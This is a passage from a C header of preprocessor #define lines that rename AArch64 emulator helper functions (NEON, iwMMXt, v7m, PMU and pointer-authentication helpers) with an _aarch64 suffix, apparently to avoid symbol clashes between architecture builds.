helper_advsimd_mulx2h_aarch64 #define helper_advsimd_muladdh helper_advsimd_muladdh_aarch64 #define helper_advsimd_muladd2h helper_advsimd_muladd2h_aarch64 #define helper_advsimd_ceq_f16 helper_advsimd_ceq_f16_aarch64 #define helper_advsimd_cge_f16 helper_advsimd_cge_f16_aarch64 #define helper_advsimd_cgt_f16 helper_advsimd_cgt_f16_aarch64 #define helper_advsimd_acge_f16 helper_advsimd_acge_f16_aarch64 #define helper_advsimd_acgt_f16 helper_advsimd_acgt_f16_aarch64 #define helper_advsimd_rinth_exact helper_advsimd_rinth_exact_aarch64 #define helper_advsimd_rinth helper_advsimd_rinth_aarch64 #define helper_advsimd_f16tosinth helper_advsimd_f16tosinth_aarch64 #define helper_advsimd_f16touinth helper_advsimd_f16touinth_aarch64 #define helper_exception_return helper_exception_return_aarch64 #define helper_sqrt_f16 helper_sqrt_f16_aarch64 #define helper_dc_zva helper_dc_zva_aarch64 #define read_raw_cp_reg read_raw_cp_reg_aarch64 #define pmu_init pmu_init_aarch64 #define pmu_op_start pmu_op_start_aarch64 #define pmu_op_finish pmu_op_finish_aarch64 #define pmu_pre_el_change pmu_pre_el_change_aarch64 #define pmu_post_el_change pmu_post_el_change_aarch64 #define arm_pmu_timer_cb arm_pmu_timer_cb_aarch64 #define arm_gt_ptimer_cb arm_gt_ptimer_cb_aarch64 #define arm_gt_vtimer_cb arm_gt_vtimer_cb_aarch64 #define arm_gt_htimer_cb arm_gt_htimer_cb_aarch64 #define arm_gt_stimer_cb arm_gt_stimer_cb_aarch64 #define arm_gt_hvtimer_cb arm_gt_hvtimer_cb_aarch64 #define arm_hcr_el2_eff arm_hcr_el2_eff_aarch64 #define sve_exception_el sve_exception_el_aarch64 #define sve_zcr_len_for_el sve_zcr_len_for_el_aarch64 #define hw_watchpoint_update hw_watchpoint_update_aarch64 #define hw_watchpoint_update_all hw_watchpoint_update_all_aarch64 #define hw_breakpoint_update hw_breakpoint_update_aarch64 #define hw_breakpoint_update_all hw_breakpoint_update_all_aarch64 #define register_cp_regs_for_features register_cp_regs_for_features_aarch64 #define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_aarch64 #define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_aarch64 #define modify_arm_cp_regs modify_arm_cp_regs_aarch64 #define get_arm_cp_reginfo get_arm_cp_reginfo_aarch64 #define arm_cp_write_ignore arm_cp_write_ignore_aarch64 #define arm_cp_read_zero arm_cp_read_zero_aarch64 #define arm_cp_reset_ignore arm_cp_reset_ignore_aarch64 #define cpsr_read cpsr_read_aarch64 #define cpsr_write cpsr_write_aarch64 #define helper_sxtb16 helper_sxtb16_aarch64 #define helper_uxtb16 helper_uxtb16_aarch64 #define helper_sdiv helper_sdiv_aarch64 #define helper_udiv helper_udiv_aarch64 #define helper_rbit helper_rbit_aarch64 #define arm_phys_excp_target_el arm_phys_excp_target_el_aarch64 #define aarch64_sync_32_to_64 aarch64_sync_32_to_64_aarch64 #define aarch64_sync_64_to_32 aarch64_sync_64_to_32_aarch64 #define arm_cpu_do_interrupt arm_cpu_do_interrupt_aarch64 #define arm_sctlr arm_sctlr_aarch64 #define arm_s1_regime_using_lpae_format arm_s1_regime_using_lpae_format_aarch64 #define aa64_va_parameters aa64_va_parameters_aarch64 #define v8m_security_lookup v8m_security_lookup_aarch64 #define pmsav8_mpu_lookup pmsav8_mpu_lookup_aarch64 #define get_phys_addr get_phys_addr_aarch64 #define arm_cpu_get_phys_page_attrs_debug arm_cpu_get_phys_page_attrs_debug_aarch64 #define helper_qadd16 helper_qadd16_aarch64 #define helper_qadd8 helper_qadd8_aarch64 #define helper_qsub16 helper_qsub16_aarch64 #define helper_qsub8 helper_qsub8_aarch64 #define helper_qsubaddx helper_qsubaddx_aarch64 #define helper_qaddsubx helper_qaddsubx_aarch64 #define helper_uqadd16 helper_uqadd16_aarch64 #define helper_uqadd8 helper_uqadd8_aarch64 #define helper_uqsub16 helper_uqsub16_aarch64 #define helper_uqsub8 helper_uqsub8_aarch64 #define helper_uqsubaddx helper_uqsubaddx_aarch64 #define helper_uqaddsubx helper_uqaddsubx_aarch64 #define helper_sadd16 helper_sadd16_aarch64 #define helper_sadd8 helper_sadd8_aarch64 #define helper_ssub16 helper_ssub16_aarch64 #define helper_ssub8 helper_ssub8_aarch64 #define helper_ssubaddx helper_ssubaddx_aarch64 #define helper_saddsubx helper_saddsubx_aarch64 #define helper_uadd16 helper_uadd16_aarch64 #define helper_uadd8 helper_uadd8_aarch64 #define helper_usub16 helper_usub16_aarch64 #define helper_usub8 helper_usub8_aarch64 #define helper_usubaddx helper_usubaddx_aarch64 #define helper_uaddsubx helper_uaddsubx_aarch64 #define helper_shadd16 helper_shadd16_aarch64 #define helper_shadd8 helper_shadd8_aarch64 #define helper_shsub16 helper_shsub16_aarch64 #define helper_shsub8 helper_shsub8_aarch64 #define helper_shsubaddx helper_shsubaddx_aarch64 #define helper_shaddsubx helper_shaddsubx_aarch64 #define helper_uhadd16 helper_uhadd16_aarch64 #define helper_uhadd8 helper_uhadd8_aarch64 #define helper_uhsub16 helper_uhsub16_aarch64 #define helper_uhsub8 helper_uhsub8_aarch64 #define helper_uhsubaddx helper_uhsubaddx_aarch64 #define helper_uhaddsubx helper_uhaddsubx_aarch64 #define helper_usad8 helper_usad8_aarch64 #define helper_sel_flags helper_sel_flags_aarch64 #define helper_crc32 helper_crc32_aarch64 #define helper_crc32c helper_crc32c_aarch64 #define fp_exception_el fp_exception_el_aarch64 #define arm_mmu_idx_to_el arm_mmu_idx_to_el_aarch64 #define arm_mmu_idx_el arm_mmu_idx_el_aarch64 #define arm_mmu_idx arm_mmu_idx_aarch64 #define arm_stage1_mmu_idx arm_stage1_mmu_idx_aarch64 #define arm_rebuild_hflags arm_rebuild_hflags_aarch64 #define helper_rebuild_hflags_m32_newel helper_rebuild_hflags_m32_newel_aarch64 #define helper_rebuild_hflags_m32 helper_rebuild_hflags_m32_aarch64 #define helper_rebuild_hflags_a32_newel helper_rebuild_hflags_a32_newel_aarch64 #define helper_rebuild_hflags_a32 helper_rebuild_hflags_a32_aarch64 #define helper_rebuild_hflags_a64 helper_rebuild_hflags_a64_aarch64 #define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_aarch64 #define aarch64_sve_narrow_vq aarch64_sve_narrow_vq_aarch64 #define aarch64_sve_change_el aarch64_sve_change_el_aarch64 #define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_aarch64 #define helper_iwmmxt_madduq helper_iwmmxt_madduq_aarch64 #define helper_iwmmxt_sadb helper_iwmmxt_sadb_aarch64 #define helper_iwmmxt_sadw helper_iwmmxt_sadw_aarch64 #define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_aarch64 #define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_aarch64 #define helper_iwmmxt_mululw helper_iwmmxt_mululw_aarch64 #define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_aarch64 #define helper_iwmmxt_macsw helper_iwmmxt_macsw_aarch64 #define helper_iwmmxt_macuw helper_iwmmxt_macuw_aarch64 #define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_aarch64 #define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_aarch64 #define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_aarch64 #define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_aarch64 #define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_aarch64 #define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_aarch64 #define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_aarch64 #define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_aarch64 #define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_aarch64 #define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_aarch64 #define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_aarch64 #define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_aarch64 #define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_aarch64 #define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_aarch64 #define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_aarch64 #define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_aarch64 #define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_aarch64 #define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_aarch64 #define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_aarch64 #define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_aarch64 #define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_aarch64 #define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_aarch64 #define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_aarch64 #define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_aarch64 #define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_aarch64 #define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_aarch64 #define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_aarch64 #define helper_iwmmxt_minsb helper_iwmmxt_minsb_aarch64 #define helper_iwmmxt_minsw helper_iwmmxt_minsw_aarch64 #define helper_iwmmxt_minsl helper_iwmmxt_minsl_aarch64 #define helper_iwmmxt_minub helper_iwmmxt_minub_aarch64 #define helper_iwmmxt_minuw helper_iwmmxt_minuw_aarch64 #define helper_iwmmxt_minul helper_iwmmxt_minul_aarch64 #define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_aarch64 #define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_aarch64 #define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_aarch64 #define helper_iwmmxt_maxub helper_iwmmxt_maxub_aarch64 #define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_aarch64 #define helper_iwmmxt_maxul helper_iwmmxt_maxul_aarch64 #define helper_iwmmxt_subnb helper_iwmmxt_subnb_aarch64 #define helper_iwmmxt_subnw helper_iwmmxt_subnw_aarch64 #define helper_iwmmxt_subnl helper_iwmmxt_subnl_aarch64 #define helper_iwmmxt_addnb helper_iwmmxt_addnb_aarch64 #define helper_iwmmxt_addnw helper_iwmmxt_addnw_aarch64 #define helper_iwmmxt_addnl helper_iwmmxt_addnl_aarch64 #define helper_iwmmxt_subub helper_iwmmxt_subub_aarch64 #define helper_iwmmxt_subuw helper_iwmmxt_subuw_aarch64 #define helper_iwmmxt_subul helper_iwmmxt_subul_aarch64 #define helper_iwmmxt_addub helper_iwmmxt_addub_aarch64 #define helper_iwmmxt_adduw helper_iwmmxt_adduw_aarch64 #define helper_iwmmxt_addul helper_iwmmxt_addul_aarch64 #define helper_iwmmxt_subsb helper_iwmmxt_subsb_aarch64 #define helper_iwmmxt_subsw helper_iwmmxt_subsw_aarch64 #define helper_iwmmxt_subsl helper_iwmmxt_subsl_aarch64 #define helper_iwmmxt_addsb helper_iwmmxt_addsb_aarch64 #define helper_iwmmxt_addsw helper_iwmmxt_addsw_aarch64 #define helper_iwmmxt_addsl helper_iwmmxt_addsl_aarch64 #define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_aarch64 #define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_aarch64 #define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_aarch64 #define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_aarch64 #define helper_iwmmxt_align helper_iwmmxt_align_aarch64 #define helper_iwmmxt_insr helper_iwmmxt_insr_aarch64 #define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_aarch64 #define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_aarch64 #define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_aarch64 #define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_aarch64 #define helper_iwmmxt_addcb helper_iwmmxt_addcb_aarch64 #define helper_iwmmxt_addcw helper_iwmmxt_addcw_aarch64 #define helper_iwmmxt_addcl helper_iwmmxt_addcl_aarch64 #define helper_iwmmxt_msbb helper_iwmmxt_msbb_aarch64 #define helper_iwmmxt_msbw helper_iwmmxt_msbw_aarch64 #define helper_iwmmxt_msbl helper_iwmmxt_msbl_aarch64 #define helper_iwmmxt_srlw helper_iwmmxt_srlw_aarch64 #define helper_iwmmxt_srll helper_iwmmxt_srll_aarch64 #define helper_iwmmxt_srlq helper_iwmmxt_srlq_aarch64 #define helper_iwmmxt_sllw helper_iwmmxt_sllw_aarch64 #define helper_iwmmxt_slll helper_iwmmxt_slll_aarch64 #define helper_iwmmxt_sllq helper_iwmmxt_sllq_aarch64 #define helper_iwmmxt_sraw helper_iwmmxt_sraw_aarch64 #define helper_iwmmxt_sral helper_iwmmxt_sral_aarch64 #define helper_iwmmxt_sraq helper_iwmmxt_sraq_aarch64 #define helper_iwmmxt_rorw helper_iwmmxt_rorw_aarch64 #define helper_iwmmxt_rorl helper_iwmmxt_rorl_aarch64 #define helper_iwmmxt_rorq helper_iwmmxt_rorq_aarch64 #define helper_iwmmxt_shufh helper_iwmmxt_shufh_aarch64 #define helper_iwmmxt_packuw helper_iwmmxt_packuw_aarch64 #define helper_iwmmxt_packul helper_iwmmxt_packul_aarch64 #define helper_iwmmxt_packuq helper_iwmmxt_packuq_aarch64 #define helper_iwmmxt_packsw helper_iwmmxt_packsw_aarch64 #define helper_iwmmxt_packsl helper_iwmmxt_packsl_aarch64 #define helper_iwmmxt_packsq helper_iwmmxt_packsq_aarch64 #define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_aarch64 #define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_aarch64 #define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_aarch64 #define armv7m_nvic_set_pending armv7m_nvic_set_pending_aarch64 #define helper_v7m_preserve_fp_state helper_v7m_preserve_fp_state_aarch64 #define write_v7m_exception write_v7m_exception_aarch64 #define helper_v7m_bxns helper_v7m_bxns_aarch64 #define helper_v7m_blxns helper_v7m_blxns_aarch64 #define armv7m_nvic_neg_prio_requested armv7m_nvic_neg_prio_requested_aarch64 #define helper_v7m_vlstm helper_v7m_vlstm_aarch64 #define helper_v7m_vlldm helper_v7m_vlldm_aarch64 #define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_aarch64 #define helper_v7m_mrs helper_v7m_mrs_aarch64 #define helper_v7m_msr helper_v7m_msr_aarch64 #define helper_v7m_tt helper_v7m_tt_aarch64 #define arm_v7m_mmu_idx_all arm_v7m_mmu_idx_all_aarch64 #define arm_v7m_mmu_idx_for_secstate_and_priv arm_v7m_mmu_idx_for_secstate_and_priv_aarch64 #define arm_v7m_mmu_idx_for_secstate arm_v7m_mmu_idx_for_secstate_aarch64 #define helper_neon_qadd_u8 helper_neon_qadd_u8_aarch64 #define helper_neon_qadd_u16 helper_neon_qadd_u16_aarch64 #define helper_neon_qadd_u32 helper_neon_qadd_u32_aarch64 #define helper_neon_qadd_u64 helper_neon_qadd_u64_aarch64 #define helper_neon_qadd_s8 helper_neon_qadd_s8_aarch64 #define helper_neon_qadd_s16 helper_neon_qadd_s16_aarch64 #define helper_neon_qadd_s32 helper_neon_qadd_s32_aarch64 #define helper_neon_qadd_s64 helper_neon_qadd_s64_aarch64 #define helper_neon_uqadd_s8 helper_neon_uqadd_s8_aarch64 #define helper_neon_uqadd_s16 helper_neon_uqadd_s16_aarch64 #define helper_neon_uqadd_s32 helper_neon_uqadd_s32_aarch64 #define helper_neon_uqadd_s64 helper_neon_uqadd_s64_aarch64 #define helper_neon_sqadd_u8 helper_neon_sqadd_u8_aarch64 #define helper_neon_sqadd_u16 helper_neon_sqadd_u16_aarch64 #define helper_neon_sqadd_u32 helper_neon_sqadd_u32_aarch64 #define helper_neon_sqadd_u64 helper_neon_sqadd_u64_aarch64 #define helper_neon_qsub_u8 helper_neon_qsub_u8_aarch64 #define helper_neon_qsub_u16 helper_neon_qsub_u16_aarch64 #define helper_neon_qsub_u32 helper_neon_qsub_u32_aarch64 #define helper_neon_qsub_u64 helper_neon_qsub_u64_aarch64 #define helper_neon_qsub_s8 helper_neon_qsub_s8_aarch64 #define helper_neon_qsub_s16 helper_neon_qsub_s16_aarch64 #define helper_neon_qsub_s32 helper_neon_qsub_s32_aarch64 #define helper_neon_qsub_s64 helper_neon_qsub_s64_aarch64 #define helper_neon_hadd_s8 helper_neon_hadd_s8_aarch64 #define helper_neon_hadd_u8 helper_neon_hadd_u8_aarch64 #define helper_neon_hadd_s16 helper_neon_hadd_s16_aarch64 #define helper_neon_hadd_u16 helper_neon_hadd_u16_aarch64 #define helper_neon_hadd_s32 helper_neon_hadd_s32_aarch64 #define helper_neon_hadd_u32 helper_neon_hadd_u32_aarch64 #define helper_neon_rhadd_s8 helper_neon_rhadd_s8_aarch64 #define helper_neon_rhadd_u8 helper_neon_rhadd_u8_aarch64 #define helper_neon_rhadd_s16 helper_neon_rhadd_s16_aarch64 #define helper_neon_rhadd_u16 helper_neon_rhadd_u16_aarch64 #define helper_neon_rhadd_s32 helper_neon_rhadd_s32_aarch64 #define helper_neon_rhadd_u32 helper_neon_rhadd_u32_aarch64 #define helper_neon_hsub_s8 helper_neon_hsub_s8_aarch64 #define helper_neon_hsub_u8 helper_neon_hsub_u8_aarch64 #define helper_neon_hsub_s16 helper_neon_hsub_s16_aarch64 #define helper_neon_hsub_u16 helper_neon_hsub_u16_aarch64 #define helper_neon_hsub_s32 helper_neon_hsub_s32_aarch64 #define helper_neon_hsub_u32 helper_neon_hsub_u32_aarch64 #define helper_neon_cgt_s8 helper_neon_cgt_s8_aarch64 #define helper_neon_cgt_u8 helper_neon_cgt_u8_aarch64 #define helper_neon_cgt_s16 helper_neon_cgt_s16_aarch64 #define helper_neon_cgt_u16 helper_neon_cgt_u16_aarch64 #define helper_neon_cgt_s32 helper_neon_cgt_s32_aarch64 #define helper_neon_cgt_u32 helper_neon_cgt_u32_aarch64 #define helper_neon_cge_s8 helper_neon_cge_s8_aarch64 #define helper_neon_cge_u8 helper_neon_cge_u8_aarch64 #define helper_neon_cge_s16 helper_neon_cge_s16_aarch64 #define helper_neon_cge_u16 helper_neon_cge_u16_aarch64 #define helper_neon_cge_s32 helper_neon_cge_s32_aarch64 #define helper_neon_cge_u32 helper_neon_cge_u32_aarch64 #define helper_neon_pmin_s8 helper_neon_pmin_s8_aarch64 #define helper_neon_pmin_u8 helper_neon_pmin_u8_aarch64 #define helper_neon_pmin_s16 helper_neon_pmin_s16_aarch64 #define helper_neon_pmin_u16 helper_neon_pmin_u16_aarch64 #define helper_neon_pmax_s8 helper_neon_pmax_s8_aarch64 #define helper_neon_pmax_u8 helper_neon_pmax_u8_aarch64 #define helper_neon_pmax_s16 helper_neon_pmax_s16_aarch64 #define helper_neon_pmax_u16 helper_neon_pmax_u16_aarch64 #define helper_neon_abd_s8 helper_neon_abd_s8_aarch64 #define helper_neon_abd_u8 helper_neon_abd_u8_aarch64 #define helper_neon_abd_s16 helper_neon_abd_s16_aarch64 #define helper_neon_abd_u16 helper_neon_abd_u16_aarch64 #define helper_neon_abd_s32 helper_neon_abd_s32_aarch64 #define helper_neon_abd_u32 helper_neon_abd_u32_aarch64 #define helper_neon_shl_u16 helper_neon_shl_u16_aarch64 #define helper_neon_shl_s16 helper_neon_shl_s16_aarch64 #define helper_neon_rshl_s8 helper_neon_rshl_s8_aarch64 #define helper_neon_rshl_s16 helper_neon_rshl_s16_aarch64 #define helper_neon_rshl_s32 helper_neon_rshl_s32_aarch64 #define helper_neon_rshl_s64 helper_neon_rshl_s64_aarch64 #define helper_neon_rshl_u8 helper_neon_rshl_u8_aarch64 #define helper_neon_rshl_u16 helper_neon_rshl_u16_aarch64 #define helper_neon_rshl_u32 helper_neon_rshl_u32_aarch64 #define helper_neon_rshl_u64 helper_neon_rshl_u64_aarch64 #define helper_neon_qshl_u8 helper_neon_qshl_u8_aarch64 #define helper_neon_qshl_u16 helper_neon_qshl_u16_aarch64 #define helper_neon_qshl_u32 helper_neon_qshl_u32_aarch64 #define helper_neon_qshl_u64 helper_neon_qshl_u64_aarch64 #define helper_neon_qshl_s8 helper_neon_qshl_s8_aarch64 #define helper_neon_qshl_s16 helper_neon_qshl_s16_aarch64 #define helper_neon_qshl_s32 helper_neon_qshl_s32_aarch64 #define helper_neon_qshl_s64 helper_neon_qshl_s64_aarch64 #define helper_neon_qshlu_s8 helper_neon_qshlu_s8_aarch64 #define helper_neon_qshlu_s16 helper_neon_qshlu_s16_aarch64 #define helper_neon_qshlu_s32 helper_neon_qshlu_s32_aarch64 #define helper_neon_qshlu_s64 helper_neon_qshlu_s64_aarch64 #define helper_neon_qrshl_u8 helper_neon_qrshl_u8_aarch64 #define helper_neon_qrshl_u16 helper_neon_qrshl_u16_aarch64 #define helper_neon_qrshl_u32 helper_neon_qrshl_u32_aarch64 #define helper_neon_qrshl_u64 helper_neon_qrshl_u64_aarch64 #define helper_neon_qrshl_s8 helper_neon_qrshl_s8_aarch64 #define helper_neon_qrshl_s16 helper_neon_qrshl_s16_aarch64 #define helper_neon_qrshl_s32 helper_neon_qrshl_s32_aarch64 #define helper_neon_qrshl_s64 helper_neon_qrshl_s64_aarch64 #define helper_neon_add_u8 helper_neon_add_u8_aarch64 #define helper_neon_add_u16 helper_neon_add_u16_aarch64 #define helper_neon_padd_u8 helper_neon_padd_u8_aarch64 #define helper_neon_padd_u16 helper_neon_padd_u16_aarch64 #define helper_neon_sub_u8 helper_neon_sub_u8_aarch64 #define helper_neon_sub_u16 helper_neon_sub_u16_aarch64 #define helper_neon_mul_u8 helper_neon_mul_u8_aarch64 #define helper_neon_mul_u16 helper_neon_mul_u16_aarch64 #define helper_neon_tst_u8 helper_neon_tst_u8_aarch64 #define helper_neon_tst_u16 helper_neon_tst_u16_aarch64 #define helper_neon_tst_u32 helper_neon_tst_u32_aarch64 #define helper_neon_ceq_u8 helper_neon_ceq_u8_aarch64 #define helper_neon_ceq_u16 helper_neon_ceq_u16_aarch64 #define helper_neon_ceq_u32 helper_neon_ceq_u32_aarch64 #define helper_neon_clz_u8 helper_neon_clz_u8_aarch64 #define helper_neon_clz_u16 helper_neon_clz_u16_aarch64 #define helper_neon_cls_s8 helper_neon_cls_s8_aarch64 #define helper_neon_cls_s16 helper_neon_cls_s16_aarch64 #define helper_neon_cls_s32 helper_neon_cls_s32_aarch64 #define helper_neon_cnt_u8 helper_neon_cnt_u8_aarch64 #define helper_neon_rbit_u8 helper_neon_rbit_u8_aarch64 #define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_aarch64 #define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_aarch64 #define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_aarch64 #define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_aarch64 #define helper_neon_narrow_u8 helper_neon_narrow_u8_aarch64 #define helper_neon_narrow_u16 helper_neon_narrow_u16_aarch64 #define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_aarch64 #define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_aarch64 #define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_aarch64 #define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_aarch64 #define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_aarch64 #define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_aarch64 #define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_aarch64 #define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_aarch64 #define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_aarch64 #define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_aarch64 #define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_aarch64 #define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_aarch64 #define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_aarch64 #define helper_neon_widen_u8 helper_neon_widen_u8_aarch64 #define helper_neon_widen_s8 helper_neon_widen_s8_aarch64 #define helper_neon_widen_u16 helper_neon_widen_u16_aarch64 #define helper_neon_widen_s16 helper_neon_widen_s16_aarch64 #define helper_neon_addl_u16 helper_neon_addl_u16_aarch64 #define helper_neon_addl_u32 helper_neon_addl_u32_aarch64 #define helper_neon_paddl_u16 helper_neon_paddl_u16_aarch64 #define helper_neon_paddl_u32 helper_neon_paddl_u32_aarch64 #define helper_neon_subl_u16 helper_neon_subl_u16_aarch64 #define helper_neon_subl_u32 helper_neon_subl_u32_aarch64 #define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_aarch64 #define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_aarch64 #define helper_neon_abdl_u16 helper_neon_abdl_u16_aarch64 #define helper_neon_abdl_s16 helper_neon_abdl_s16_aarch64 #define helper_neon_abdl_u32 helper_neon_abdl_u32_aarch64 #define helper_neon_abdl_s32 helper_neon_abdl_s32_aarch64 #define helper_neon_abdl_u64 helper_neon_abdl_u64_aarch64 #define helper_neon_abdl_s64 helper_neon_abdl_s64_aarch64 #define helper_neon_mull_u8 helper_neon_mull_u8_aarch64 #define helper_neon_mull_s8 helper_neon_mull_s8_aarch64 #define helper_neon_mull_u16 helper_neon_mull_u16_aarch64 #define helper_neon_mull_s16 helper_neon_mull_s16_aarch64 #define helper_neon_negl_u16 helper_neon_negl_u16_aarch64 #define helper_neon_negl_u32 helper_neon_negl_u32_aarch64 #define helper_neon_qabs_s8 helper_neon_qabs_s8_aarch64 #define helper_neon_qneg_s8 helper_neon_qneg_s8_aarch64 #define helper_neon_qabs_s16 helper_neon_qabs_s16_aarch64 #define helper_neon_qneg_s16 helper_neon_qneg_s16_aarch64 #define helper_neon_qabs_s32 helper_neon_qabs_s32_aarch64 #define helper_neon_qneg_s32 helper_neon_qneg_s32_aarch64 #define helper_neon_qabs_s64 helper_neon_qabs_s64_aarch64 #define helper_neon_qneg_s64 helper_neon_qneg_s64_aarch64 #define helper_neon_abd_f32 helper_neon_abd_f32_aarch64 #define helper_neon_ceq_f32 helper_neon_ceq_f32_aarch64 #define helper_neon_cge_f32 helper_neon_cge_f32_aarch64 #define helper_neon_cgt_f32 helper_neon_cgt_f32_aarch64 #define helper_neon_acge_f32 helper_neon_acge_f32_aarch64 #define helper_neon_acgt_f32 helper_neon_acgt_f32_aarch64 #define helper_neon_acge_f64 helper_neon_acge_f64_aarch64 #define helper_neon_acgt_f64 helper_neon_acgt_f64_aarch64 #define helper_neon_qunzip8 helper_neon_qunzip8_aarch64 #define helper_neon_qunzip16 helper_neon_qunzip16_aarch64 #define helper_neon_qunzip32 helper_neon_qunzip32_aarch64 #define helper_neon_unzip8 helper_neon_unzip8_aarch64 #define helper_neon_unzip16 helper_neon_unzip16_aarch64 #define helper_neon_qzip8 helper_neon_qzip8_aarch64 #define helper_neon_qzip16 helper_neon_qzip16_aarch64 #define helper_neon_qzip32 helper_neon_qzip32_aarch64 #define helper_neon_zip8 helper_neon_zip8_aarch64 #define helper_neon_zip16 helper_neon_zip16_aarch64 #define raise_exception raise_exception_aarch64 #define raise_exception_ra raise_exception_ra_aarch64 #define helper_neon_tbl helper_neon_tbl_aarch64 #define helper_v8m_stackcheck helper_v8m_stackcheck_aarch64 #define helper_add_setq helper_add_setq_aarch64 #define helper_add_saturate helper_add_saturate_aarch64 #define helper_sub_saturate helper_sub_saturate_aarch64 #define helper_add_usaturate helper_add_usaturate_aarch64 #define helper_sub_usaturate helper_sub_usaturate_aarch64 #define helper_ssat helper_ssat_aarch64 #define helper_ssat16 helper_ssat16_aarch64 #define helper_usat helper_usat_aarch64 #define helper_usat16 helper_usat16_aarch64 #define helper_setend helper_setend_aarch64 #define helper_wfi helper_wfi_aarch64 #define helper_wfe helper_wfe_aarch64 #define helper_yield helper_yield_aarch64 #define helper_exception_internal helper_exception_internal_aarch64 #define helper_exception_with_syndrome helper_exception_with_syndrome_aarch64 #define helper_exception_bkpt_insn helper_exception_bkpt_insn_aarch64 #define helper_cpsr_read helper_cpsr_read_aarch64 #define helper_cpsr_write helper_cpsr_write_aarch64 #define helper_cpsr_write_eret helper_cpsr_write_eret_aarch64 #define helper_get_user_reg helper_get_user_reg_aarch64 #define helper_set_user_reg helper_set_user_reg_aarch64 #define helper_set_r13_banked helper_set_r13_banked_aarch64 #define helper_get_r13_banked helper_get_r13_banked_aarch64 #define helper_msr_banked helper_msr_banked_aarch64 #define helper_mrs_banked helper_mrs_banked_aarch64 #define helper_access_check_cp_reg helper_access_check_cp_reg_aarch64 #define helper_set_cp_reg helper_set_cp_reg_aarch64 #define helper_get_cp_reg helper_get_cp_reg_aarch64 #define helper_set_cp_reg64 helper_set_cp_reg64_aarch64 #define helper_get_cp_reg64 helper_get_cp_reg64_aarch64 #define helper_pre_hvc helper_pre_hvc_aarch64 #define helper_pre_smc helper_pre_smc_aarch64 #define helper_shl_cc helper_shl_cc_aarch64 #define helper_shr_cc helper_shr_cc_aarch64 #define helper_sar_cc helper_sar_cc_aarch64 #define helper_ror_cc helper_ror_cc_aarch64 #define helper_pacia helper_pacia_aarch64 #define helper_pacib helper_pacib_aarch64 #define helper_pacda helper_pacda_aarch64 #define helper_pacdb helper_pacdb_aarch64 #define helper_pacga helper_pacga_aarch64 #define helper_autia helper_autia_aarch64 #define helper_autib helper_autib_aarch64 #define helper_autda helper_autda_aarch64 #define helper_autdb helper_autdb_aarch64 #define helper_xpaci helper_xpaci_aarch64 #define helper_xpacd helper_xpacd_aarch64 #define arm_is_psci_call arm_is_psci_call_aarch64 #define arm_handle_psci_call 